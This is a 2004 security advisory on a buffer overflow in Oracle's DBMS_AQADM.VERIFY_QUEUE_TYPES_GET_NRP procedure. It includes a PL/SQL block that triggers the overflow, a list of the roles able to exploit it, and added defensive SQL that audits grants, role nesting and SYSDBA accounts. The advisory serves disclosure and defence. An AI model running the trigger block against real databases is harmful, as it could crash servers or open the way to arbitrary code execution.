Application Security Inc. - Database Security, Monitoring, Assessment, Auditing, Encryption, and Regulatory Compliance.
Team SHATTER Security Alert

#28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of DBMS_AQADM package

August 31, 2004

Credit: This vulnerability was researched and discovered by Esteban Martínez Fayó of Application Security, Inc.

Risk level: Medium

Details:
When the VERIFY_QUEUE_TYPES_GET_NRP procedure is called with a long string in the SRC_QUEUE_NAME parameter, a buffer overflow occurs.

To reproduce the overflow, execute the following PL/SQL block:

DECLARE
  P_SRC_QUEUE_NAME  VARCHAR2(32767);
  P_DEST_QUEUE_NAME VARCHAR2(32767);
  P_DESTINATION     VARCHAR2(32767);
  P_RC              BINARY_INTEGER;
  P_TRANSFORMATION  VARCHAR2(32767);
BEGIN
  -- 'longstring' stands for an over-long value; SRC_QUEUE_NAME is the parameter that triggers the overflow
  P_SRC_QUEUE_NAME  := 'longstring';
  P_DEST_QUEUE_NAME := '';
  P_DESTINATION     := '';
  P_TRANSFORMATION  := '';
  SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_GET_NRP(
    SRC_QUEUE_NAME  => P_SRC_QUEUE_NAME,
    DEST_QUEUE_NAME => P_DEST_QUEUE_NAME,
    DESTINATION     => P_DESTINATION,
    RC              => P_RC,
    TRANSFORMATION  => P_TRANSFORMATION);
END;
/

Analysis:
This vulnerability can be exploited by members of any of the following roles: EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, QS_ADM, QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS and SYSDBA, as well as by users granted EXECUTE permission on the DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
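The following SQL is an added set of defender-side checks for the exposure described in the Details and Analysis sections; it is not part of the original advisory or of any AppSec Inc tool. It assumes a DBA session on an Oracle 9i or 10g instance and uses only standard data dictionary views (V$VERSION, DBA_TAB_PRIVS, DBA_ROLE_PRIVS, DBA_USERS, V$PWFILE_USERS). The grantee in the final REVOKE is a placeholder to be filled in from the output of step 2.

```sql
-- Added defensive checks for the DBMS_AQADM exposure (example, not from the advisory).
-- Assumes a DBA session; all views are standard Oracle data dictionary views.

-- 1. Confirm the running version: the advisory states 9.2.0.5 (Patchset 4) is fixed
--    and 10g is not vulnerable, so anything below 9.2.0.5 on 9i is in scope.
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

-- 2. Direct EXECUTE grants on the package: users, roles, or PUBLIC.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_AQADM'
 ORDER BY grantee;

-- 3. Every user who ends up holding one of the roles named in the advisory,
--    including through nested role grants (hierarchical walk over DBA_ROLE_PRIVS:
--    start at the listed roles, then follow rows whose GRANTED_ROLE is a grantee
--    found one level up). The outer filter keeps only real users, not intermediate roles.
SELECT holder, via_role, depth
  FROM (
        SELECT grantee AS holder, granted_role AS via_role, LEVEL AS depth
          FROM dba_role_privs
         START WITH granted_role IN ('EXECUTE_CATALOG_ROLE', 'IMP_FULL_DATABASE',
                                     'QS_ADM', 'QS', 'QS_WS', 'QS_ES', 'QS_OS',
                                     'QS_CBADM', 'QS_CB', 'QS_CS')
         CONNECT BY PRIOR grantee = granted_role
       )
 WHERE holder IN (SELECT username FROM dba_users)
 ORDER BY holder, depth;

-- 4. Accounts that can connect AS SYSDBA through the password file.
SELECT username, sysdba
  FROM v$pwfile_users
 WHERE sysdba = 'TRUE';

-- 5. Until the patchset is applied: log every call to the package so that
--    attempts show up in the audit trail (requires AUDIT_TRAIL to be enabled),
--    and revoke EXECUTE from any grantee found in step 2 that does not need it.
AUDIT EXECUTE ON SYS.DBMS_AQADM BY ACCESS;
-- REVOKE EXECUTE ON SYS.DBMS_AQADM FROM <grantee_from_step_2>;  -- placeholder grantee
```

Step 3 is the one worth keeping after the patch is installed: the same hierarchical query, with the role list swapped, answers "who can actually reach this package" for any future DBMS_AQADM advisory, because role nesting routinely hides grants that a flat look at DBA_ROLE_PRIVS misses.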

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g is not vulnerable.